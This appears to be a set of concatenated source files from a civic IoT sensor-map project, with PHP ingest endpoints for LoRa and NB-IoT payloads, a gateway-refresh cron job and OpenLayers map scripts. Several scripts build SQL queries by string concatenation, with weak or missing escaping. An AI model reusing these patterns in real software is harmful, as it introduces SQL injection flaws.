curl_setopt($ch1, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
'X-Pin: 1',
'X-Sensor: '.$luftdatenSensorName));
$resultLuftDaten = curl_exec($ch1);
logerror('JSON to LuftDaten ('.$luftdatenSensorName.'): '.$luftdatenData);
logerror('Result from LuftDaten: '.$resultLuftDaten);
}
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep><script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-100353310-1', 'auto');
ga('send', 'pageview');
</script>
<script type="text/javascript">
window.smartlook||(function(d) {
var o=smartlook=function(){ o.api.push(arguments)},h=d.getElementsByTagName('head')[0];
var c=d.createElement('script');o.api=new Array();c.async=true;c.type='text/javascript';
c.charset='utf-8';c.src='https://rec.smartlook.com/recorder.js';h.appendChild(c);
})(document);
smartlook('init', 'ec0a1db895268f5147945b6ff6c3e176bd0006a6');
</script><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['lastminute'])) {
die("Invalid Id parameter");
}
var_dump($_REQUEST);
$sql = 'INSERT INTO measurement26 SET Moment=NOW(), Tagvalue='.$_REQUEST['lastminute'];
echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastmessage=NOW() WHERE Id = 10';
echo $sql;
$result = mysqlquery($sql);
?><file_sep><?php
set_time_limit(60);
include('db.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
//$data = json_decode(file_get_contents('php://input'));
//logerror($data);
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror($data);
//logerror("Rawpostttnmapper: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO loraraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
if(isset($data->payload_fields->gps_1)) {
if($data->payload_fields->gps_1->latitude > 86 || $data->payload_fields->gps_1->latitude < -86) {
logerror('Invalid latitude');
die('Invalid latitude');
}
if($data->payload_fields->gps_1->longitude > 180 || $data->payload_fields->gps_1->longitude < -180) {
logerror('Invalid longitude');
die('Invalid longitude');
}
}
switch($data->hardware_serial) {
case '0000000002E00615':
if(($data->payload_fields->analog_in_2*100) < 300) {
$sql = 'INSERT INTO gpslocation1 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_1->latitude).', Lon='.addslashes($data->payload_fields->gps_1->longitude).', Alt='.addslashes($data->payload_fields->gps_1->altitude).', Hdop='.addslashes($data->payload_fields->analog_in_2);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
$last_id = mysqli_insert_id($connection);
//logerror('Result: '.$last_id);
foreach($data->metadata->gateways as $gateway)
{
$json = '{'."\n";
$json .= '"time":"'.substr($data->metadata->time, 0, 23).'",'."\n";
$json .= '"devid":"'.$data->dev_id.'",'."\n";
$json .= '"appid":"'.$data->app_id.'",'."\n";
$json .= '"gwaddr":"'.$gateway->gtw_id.'",'."\n";
$json .= '"snr":"'.$gateway->snr.'",'."\n";
$json .= '"rssi":"'.$gateway->rssi.'",'."\n";
$json .= '"freq":"'.$data->metadata->frequency.'",'."\n";
$json .= '"datarate":"'.$data->metadata->data_rate.'",'."\n";
$json .= '"lat":"'.$data->payload_fields->gps_1->latitude.'",'."\n";
$json .= '"lon":"'.$data->payload_fields->gps_1->longitude.'",'."\n";
$json .= '"appeui":"70B3D57EF0006373",'."\n";
$json .= '"alt":"'.$data->payload_fields->gps_1->altitude.'",'."\n";
$json .= '"accuracy":"'.$data->payload_fields->analog_in_2.'",'."\n";
$json .= '"provider":"gps",'."\n";
$json .= '"user_id":"<NAME>"'."\n";
//$json .= ', "experiment":"Industrial IT GPS tracker Test"'."\n";
$json .= '}';
logerror("TTN MapperJson: ".$json);
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
logerror("GPS data: ".$sql1);
$result1 = mysqlquery($sql1);
$url = "http://ttnmapper.org/api/";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Content-type: application/json"));
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $json);
logerror("voor curl");
$json_response = curl_exec($curl);
logerror("na curl");
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
logerror("curl status: ".$status);
if ( $status != 200 ) {
logerror("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
die("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
}
logerror("curl voor close");
curl_close($curl);
logerror("curl na close");
logerror("TTN MapperJson response: ".$json_response);
$response = json_decode($json_response, true);
logerror("TTN MapperJson responsejson: ".$response);
}
}
break;
}
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep>// get last hour sensor data
var sensorHourStyleCache = {};
var sensorHourDataLayer = new ol.layer.Vector({
title: 'sensoren vandaag',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/sensors_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorHourStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorHourStyleCache[size] = style;
}
return style;
}
});
// get all sensor data
var sensorAllStyleCache = {};
var sensorAllDataLayer = new ol.layer.Vector({
visible: false,
title: 'sensoren alles',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/sensors_json.php?select=all',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorAllStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorAllStyleCache[size] = style;
}
return style;
}
});
// get getways
var gatewayStyleCache = {};
var gatewayDataLayer = new ol.layer.Vector({
title: 'gateways',
source: new ol.source.Cluster({
distance: 40,
source: new ol.source.Vector({
url: 'data/gateways_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992',
format: new ol.format.GeoJSON()
})
}),
style: function (feature, resolution) {
var size = feature.get('features').length;
var style = gatewayStyleCache[size];
if (!style) {
var label = '';
if (size > 1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 1,
anchor: [0.5, 1],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/ttn.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 0,
offsetY: 0,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
gatewayStyleCache[size] = style;
}
return style;
}
});
function dataPopups(evt) {
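// Shows a popup with sensor or gateway details for the clicked (clustered) map feature.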
// Hide the existing popup and reset its offset
popup.hide();
popup.setOffset([0, 0]);
// Attempt to find a feature in one of the visible vector layers
var feature = map.forEachFeatureAtPixel(evt.pixel, function(feature, layer) {
return feature;
});
//feature = feature.get('features')[0];
// if (feature) {
// var coord = feature.getGeometry().getCoordinates();
// var props = feature.getProperties();
// var info;
// if (feature != null) {
// info = '<h2>' + feature.o[0].location + '</h2>';
// info += '<i>' + feature.o[0].timestamp + '</i><br/>';
// var arrayTags = $.map(feature.o, function (value, index) {
// return [value];
// });
// for (index = 0; index < arrayTags.length; ++index) {
// if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
// info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
// }
// }
// }
// // Offset the popup so it points at the middle of the marker not the tip
// popup.setOffset([10, -60]);
// popup.show(coord, info);
// }
if (feature != null) {
feature = feature.get('features')[0];
if (feature) {
console.log('Click');
var coord = feature.getGeometry().getCoordinates();
var props = feature.getProperties();
var info;
if (feature != null) {
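// NOTE: feature.N / feature.S below appear to rely on OpenLayers-internal (build-specific)
// property names; feature.get('features') / feature.getProperties() are the stable accessors.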
if (feature.N[0].type == 'sensor') {
info = '<p width="800" height="800">';
info += '<h2>' + feature.N[0].location + '</h2>';
info += '<i>' + feature.N[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.S, function (value, index) {
return [value];
});
for (index = 0; index < arrayTags.length; ++index) {
if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
}
}
info += '<iframe src="https://apeldoornindata.nl/data/chart.php?id=' + feature.N[0].nodeid + '" frameborder="0" height="100" scrolling="no"></iframe>';
info += '<a href="https://apeldoornindata.nl/data/node.php?id=' + feature.N[0].nodeid + '">Data</a><br/>';
info += '</p>';
} else {
info = '<p width="800" height="300">';
info += '<b>' + feature.N[0].location + '</b><br/>';
info += '<i>' + feature.N[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.S, function (value, index) {
return [value];
});
info += '<a href="http://ttnmapper.org/?gateway=' + feature.N[0].location.replace("eui-", "").toUpperCase() + '&type=radar" target="_blanc">TTN Mapper</a><br/>';
info += '</p>';
}
}
// Offset the popup so it points at the middle of the marker not the tip
popup.setOffset([10, -60]);
popup.autoSize = false;
//popup.setSize(new ol.source.size(500, 300));
popup.show(coord, info);
}
} else {
console.log('null object');
}
}
<file_sep><?php
function getElsysArray($payloadraw) {
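// Decodes an Elsys sensor payload: base64 -> hex -> byte array, then walks the bytes as a
// sequence of [type byte][value bytes] records (temperature, humidity, light, CO2, VDD, ...).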
$payload = bin2hex(base64_decode($payloadraw));
$arrPayload = hexToBytes($payload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($arrPayload[$i]) {
case '01': // Temperature
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['temperature'] = $temp / 10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
$i = $i + 2;
break;
case '02': // Humidity
$rh = hexdec($arrPayload[$i + 1]);
$returnArray['humidity'] = $rh;
//echo 'RH '.$returnArray['humidity'].'<br/>';
$i = $i + 1;
break;
case '03': // Acceleration
$returnArray['x'] = hexdec($arrPayload[$i + 1]);
$returnArray['y'] = hexdec($arrPayload[$i + 2]);
$returnArray['z'] = hexdec($arrPayload[$i + 3]);
$i = $i + 3;
break;
case '04': // Light
$light = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['light'] = $light;
//echo 'Light '.$returnArray['light'].'<br/>';
$i = $i + 2;
break;
case '05': // Motion sensor(PIR)
$pir = hexdec($arrPayload[$i + 1]);
$returnArray['pir'] = $pir;
//echo 'PIR '.$returnArray['pir'].'<br/>';
$i = $i + 1;
break;
case '06': // Co2
$cotwo = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['co2'] = $cotwo;
//echo 'CO2 '.$returnArray['co2'].'<br/>';
$i = $i + 2;
break;
case '07': // VDD battery
$vdd = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['vdd'] = $vdd;
//echo 'VDD '.$returnArray['vdd'].'<br/>';
$i = $i + 2;
break;
case '08': // Analog in 1
$ai1 = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['ai1'] = $ai1;
//echo 'Ai1 '.$returnArray['ai1'].'<br/>';
$i = $i + 2;
break;
case '09': // GPS
$returnArray['lat'] = hexdec($arrPayload[$i + 1]) * 256 * 256 + hexdec($arrPayload[$i + 2]) * 256 + hexdec($arrPayload[$i + 3]);
$returnArray['lon'] = hexdec($arrPayload[$i + 4]) * 256 * 256 + hexdec($arrPayload[$i + 5]) * 256 + hexdec($arrPayload[$i + 6]);
//echo 'Lat '.$returnArray['lat'].'<br/>';
//echo 'Lat '.$returnArray['lon'].'<br/>';
$i = $i + 6;
break;
case '0A': // Pulse
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['pulse'] = $temp;
//echo 'pulse '.$returnArray['pulse'].'<br/>';
$i = $i + 2;
break;
case '0B': // Pulse input 1 absolute value
$returnArray['pulseabs'] = hexdec($arrPayload[$i + 1]) * 256 * 256 * 256 + hexdec($arrPayload[$i + 2]) * 256 * 256 + hexdec($arrPayload[$i + 3]) * 256 + hexdec($arrPayload[$i + 4]);
//echo 'Pulse '.$returnArray['pulseabs'].'<br/>';
$i = $i + 4;
break;
case '0C': // Temperature external
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['temperatureext'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$i = $i + 2;
break;
case '10': // IR Temperature
$temp = hexdec($arrPayload[$i + 1]) * 256 + hexdec($arrPayload[$i + 2]);
$returnArray['irtempint'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$temp = hexdec($arrPayload[$i + 3]) * 256 + hexdec($arrPayload[$i + 4]);
$returnArray['irtempext'] = $temp / 10;
//echo 'Temp '.$returnArray['temperatureext'].'<br/>';
$i = $i + 4;
break;
case '11': // Occupancy
$pir = hexdec($arrPayload[$i + 1]);
$returnArray['occupancy'] = $pir;
//echo 'PIR '.$returnArray['pir'].'<br/>';
$i = $i + 1;
break;
}
}
return $returnArray;
}
if(!function_exists('hexToBytes')){
function hexToBytes($hex) {
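// Splits a hex string into an array of two-character byte strings.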
$bytes = array();
echo 'Payload length: '.strlen($hex).'<br/>';
for ($c = 0; $c < strlen($hex); $c += 2) {
array_push($bytes, substr($hex, $c, 2));
}
return $bytes;
}
}
?><file_sep><?php
include('db.php');
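// Builds a GeoJSON FeatureCollection of TTN gateways seen during the last 7 days.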
$sql = 'SELECT * FROM ttngateways WHERE Lastseen >= DATE_SUB(NOW(), INTERVAL 7 DAY)';
//echo $sql;
$arrSensorData = array("type" => "FeatureCollection", "features" => array());
$arrMeasurement = array();
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row1);
$arrProperties = null;
$arrProperties["type"] = "gateway";
$arrProperties["location"] = $row["Gwid"];
$arrProperties["name"] = $row["Gwid"];
$arrProperties["timestamp"] = $row["Lastseen"];
$arrMeasurementItem["properties"][] = $arrProperties;
$arrMeasurementItem["type"] = "Feature";
$arrMeasurementItem["name"] = $row["Gwid"];
$arrMeasurementItem["geometry"] = array("type" => "Point", "coordinates" => array(floatval($row["Longitude"]), floatval($row["Latitude"])));
$arrMeasurement[] = $arrMeasurementItem;
$arrMeasurementItem = null;
}
$arrSensorData["features"] = $arrMeasurement;
echo json_encode($arrSensorData, JSON_PRETTY_PRINT);
exit();
?>
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [5.943877, 52.1843 ]
}
}
]
}<file_sep><?php
include('db.php');
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
$totalPackages = 0;
$sql = 'SELECT * FROM gateway WHERE Lastmessage >= DATE_SUB(NOW(),INTERVAL 14 DAY) ORDER BY Packets DESC LIMIT 1000';
//echo $sql;
$result = mysqlquery($sql);
echo '<table border="1">';
echo '<tr><th>Gateway</th><th>Name</th><th>Last</th><th>Packets</th><th>Ch0</th><th>Ch1</th><th>Ch2</th><th>Ch3</th><th>Ch4</th><th>Ch5</th><th>Ch6</th><th>Ch7</th><th>Sf7</th><th>Sf8</th><th>Sf9</th><th>Sf10</th><th>Sf11</th><th>Sf12</th></tr>';
while ($row = mysqli_fetch_array($result))
{
echo '<tr>';
echo '<td>'.$row['Gateway'].'</td>';
echo '<td>'.$row['Name'].'</td>';
$utc_date = DateTime::createFromFormat(
'Y-m-d H:i:s',
$row['Lastmessage'],
new DateTimeZone('UTC')
);
$localTime = $utc_date;
$localTime->setTimeZone(new DateTimeZone('Europe/Amsterdam'));
echo '<td>'.$localTime->format('Y-m-d H:i:s').'</td>';
echo '<td class="alnright">'.number_format($row['Packets'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch0'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch1'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch2'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch3'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch4'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch5'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch6'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Ch7'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf7'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf8'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf9'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf10'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf11'], 0, '', '.').'</td>';
echo '<td class="alnright">'.number_format($row['Sf12'], 0, '', '.').'</td>';
echo '</tr>'."\n";
$totalPackages += $row['Packets'];
}
echo '<tr>';
echo '<td></td>';
echo '<td></td>';
echo '<td class="alnright"><strong>Totaal:</strong></td>';
echo '<td class="alnright"><strong>'.number_format($totalPackages, 0, '', '.').'</strong></td>';
echo '<td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td>';
echo '</tr>'."\n";
echo '</table>';
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
logerror('start Cron 1 day');
echo 'Starting 1day cron<br/>';
$sqlTruncate = 'TRUNCATE apeldoornindata.ttngateways';
//echo $sqlTruncate.'<br/>';
mysqlquery($sqlTruncate);
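// Refresh the gateway cache: pull the current gateway list from the TTN NOC API and
// re-insert every gateway that reports a location.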
$c = curl_init('http://noc.thethingsnetwork.org:8085/api/v2/gateways');
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
//curl_setopt(... other options you want...)
$html = curl_exec($c);
if (curl_error($c))
die(curl_error($c));
// Get the status code
$status = curl_getinfo($c, CURLINFO_HTTP_CODE);
curl_close($c);
$jsonGateways = json_decode($html);
foreach((array) $jsonGateways->statuses as $key => $jsonGateway) {
$gatewayId = $key;
$lastSeen = $jsonGateway->timestamp;
$lat = null;
$lon = null;
if(isset($jsonGateway->location->latitude)) {
$lat = $jsonGateway->location->latitude;
}
if(isset($jsonGateway->location->longitude)) {
$lon = $jsonGateway->location->longitude;
}
//vardump($key);
//vardump($jsonGateway);
$sqlInsert = 'INSERT INTO apeldoornindata.ttngateways SET Gwid = \''.$gatewayId.'\', Lastseen = \''.$lastSeen.'\'';
if($lat != null && $lon != null) {
$sqlInsert .= ', Latitude = \''.$lat.'\', Longitude = \''.$lon.'\'';
//echo $sqlInsert.'<br/>';
mysqlquery($sqlInsert);
}
$sqlInsert='';
}
logerror('End Cron 1 day');
?><file_sep><?php
include('db.php');
logInfo('start nbiotdata');
/*
logInfo("Postcount: ". count($_POST));
logInfo(implode(",", $_POST));
logInfo("Requestcount: ". count($_REQUEST));
logInfo(implode(",", $_REQUEST));
logInfo("Getcount: ". count($_GET));
logInfo(implode(",", $_GET));
$data = file_get_contents('php://input');
logInfo("input: ".$data);
logInfo($HTTP_RAW_POST_DATA);
$data = file_get_contents('php://stdin');
logInfo('stdin: '.$data);
logInfo("Rawpost: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
*/
logInfo("input: ".json_encode(file_get_contents('php://input')));
/*logInfo("stdin: ".json_encode(file_get_contents('php://stdin')));
logInfo("HTTP_RAW_POST_DATA: ".json_encode($HTTP_RAW_POST_DATA));
logInfo("_GET: ".json_encode($_GET));
logInfo("_POST: ".json_encode($_POST));
logInfo("_REQUEST: ".json_encode($_REQUEST));
//logInfo("getallheaders: ".json_encode(getallheaders()));
*/
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO nbiotraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\', Nodeid=16';
//logInfo('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
logInfo("Deviceid: ".$data->reports[0]->serialNumber);
switch($data->reports[0]->serialNumber) {
case 'IMEI:357518080039852':
logInfo("Payload: ".$data->reports[0]->value);
//$decoded = base64_decode($data->reports[0]->value);
$decoded = $data->reports[0]->value;
logInfo("Decoded: ".$decoded);
$temperature = substr($decoded, 0, 4);
$temperature = hexdec($temperature)/100;
logInfo("Temperature: ".$temperature);
$sql = 'INSERT INTO measurement38 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($temperature);
//echo $sql;
$result = mysqlquery($sql);
$humidity = substr($decoded, 4, 4);
$humidity = hexdec($humidity)/100;
logInfo("Humidity: ".$humidity);
$sql = 'INSERT INTO measurement39 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($humidity);
//echo $sql;
$result = mysqlquery($sql);
$pressure = substr($decoded, 8, 4);
$pressure = hexdec($pressure);
logInfo("Pressure: ".$pressure);
$sql = 'INSERT INTO measurement40 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pressure);
//echo $sql;
$result = mysqlquery($sql);
$lat = substr($decoded, 12, 8);
$lat = hexdec($lat)/100000;
$lon = substr($decoded, 20, 8);
$lon = hexdec($lon)/100000;
logInfo("Lat: ".$lat);
logInfo("Lon: ".$lon);
$sql = 'INSERT INTO gpslocation16 SET Moment=\''.$dateNow.'\', Lat='.addslashes($lat).', Lon='.addslashes($lon);
//echo $sql;
$result = mysqlquery($sql);
$accelX = substr($decoded, 28, 4);
$accelX = hexdec($accelX)/100 - 100;
logInfo("AccelX: ".$accelX);
$sql = 'INSERT INTO measurement41 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelX);
//echo $sql;
$result = mysqlquery($sql);
$accelY = substr($decoded, 32, 4);
$accelY = hexdec($accelY)/100 - 100;
logInfo("AccelY: ".$accelY);
$sql = 'INSERT INTO measurement42 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelY);
//echo $sql;
$result = mysqlquery($sql);
$accelZ = substr($decoded, 36, 4);
$accelZ = hexdec($accelZ)/100 - 100;
logInfo("AccelZ: ".$accelZ);
$sql = 'INSERT INTO measurement43 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($accelZ);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastmessage=\''.$dateNow.'\', Packets = Packets + 1';
if($lat != 0 && $lon != 0) {
$sql .= ', Lastlocationlat = '.addslashes($lat).', Lastlocationlon = '.addslashes($lon);
}
$sql .= ' WHERE Id=16';
//echo $sql;
$result = mysqlquery($sql);
break;
}
}
?><file_sep><!DOCTYPE html>
<html>
<head>
<title>Apeldoorn in Data</title>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<!-- Load OpenLayers and plugins: popup, layerswitcher -->
<link rel="stylesheet" href="https://openlayers.org/en/v4.6.5/css/ol.css" type="text/css">
<script src="https://openlayers.org/en/v4.6.5/build/ol.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/proj4js/2.4.3/proj4.js" type="text/javascript"></script>
<script src="https://epsg.io/28992-1753.js"></script>
<link rel="stylesheet" href="https://rawgit.com/walkermatt/ol3-popup/master/src/ol3-popup.css" type="text/css">
<script src="https://rawgit.com/walkermatt/ol3-popup/master/src/ol3-popup.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/openlayers.layerswitcher/1.1.0/ol3-layerswitcher.css" type="text/css">
<script src="https://cdn.jsdelivr.net/openlayers.layerswitcher/1.1.0/ol3-layerswitcher.js"></script>
<!-- Load Apeldoorn In Data javascript and stylesheet -->
<link rel="stylesheet" type="text/css" href="style/apeldoornindata.css" media="all" />
<!-- <script src="js/apeldoornindata.js"></script> -->
<script src="js/mapfunctions.js"></script>
<script src="js/backgroundlayers.js"></script>
<script src="js/datalayers.js"></script>
<script src="js/maplayers.js"></script>
<?php
include('data/headinclude.php');
?>
</head>
<body id="body" style="text-align: center; margin:0px; ">
<?php
include('data/db.php');
include('data/menu.php');
//echo '<div class="container">'."\n";
?>
<!--[if lt IE 10]>
<p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<div id="map">
<div id="popup" class="ol-popup">
<a href="#" id="popup-closer" class="ol-popup-closer"></a>
<div id="popup-content"></div>
</div>
</div>
<div id="logo">
<img src="images/logo.png" width="100%"/>
</div>
<div id="legend">
</div>
<script>
"use strict";
var data = null;
var canvas;
var context;
var canvasOrigin;
var delta;
var width;
var height;
var bbox;
var timer = null;
var map;
// code to rescale map and ahn overlay when zooming or changing window size
function redisplay() {
// clear canvas
if (context) {
var imgData = context.getImageData(0,0,width,height);
for(var i=0;i<imgData.data.length;i++) imgData.data[i] = 0;
context.putImageData(imgData,0,0);
map.renderSync();
}
// draw heatmap
if (data!=null) drawHeatmap(context, map, data, 'legend');
}
var canvasFunction = function(extent, resolution, pixelRatio, size, projection) {
canvas = document.createElement('canvas');
context = canvas.getContext('2d');
width = Math.round(size[0]), height = Math.round(size[1]);
canvas.setAttribute('width', width);
canvas.setAttribute('height', height);
// Canvas extent is different than map extent, so compute delta between
// left-top of map and canvas extent.
var mapExtent = map.getView().calculateExtent(map.getSize())
var mapOrigin = map.getPixelFromCoordinate([mapExtent[0], mapExtent[3]]);
canvasOrigin = map.getPixelFromCoordinate([extent[0], extent[3]]);
delta = [mapOrigin[0]-canvasOrigin[0], mapOrigin[1]-canvasOrigin[1]]
return canvas;
};
var heatmap = new ol.source.ImageCanvas({
canvasFunction: canvasFunction
});
map = new ol.Map({
target: 'map',
renderer: 'canvas', // Force the renderer to be used
layers: [
new ol.layer.Group({
title: 'Achtergrond',
layers: [
topografie,
luchtfoto,
ahn
]
}),
//new ol.layer.Group({
// title: 'Kaarten',
// layers: [
// hittekaart
// ]
//}),
new ol.layer.Group({
title: 'Data',
layers: [
gatewayDataLayer,
sensorAllDataLayer,
sensorHourDataLayer
]
})
],
view: new ol.View({
center: ol.proj.transform([5.967808, 52.210973], 'EPSG:4326', 'EPSG:900913'),
zoom: 13
})
});
// add layer switcher
var layerSwitcher = new ol.control.LayerSwitcher();
map.addControl(layerSwitcher);
// add data popup routines
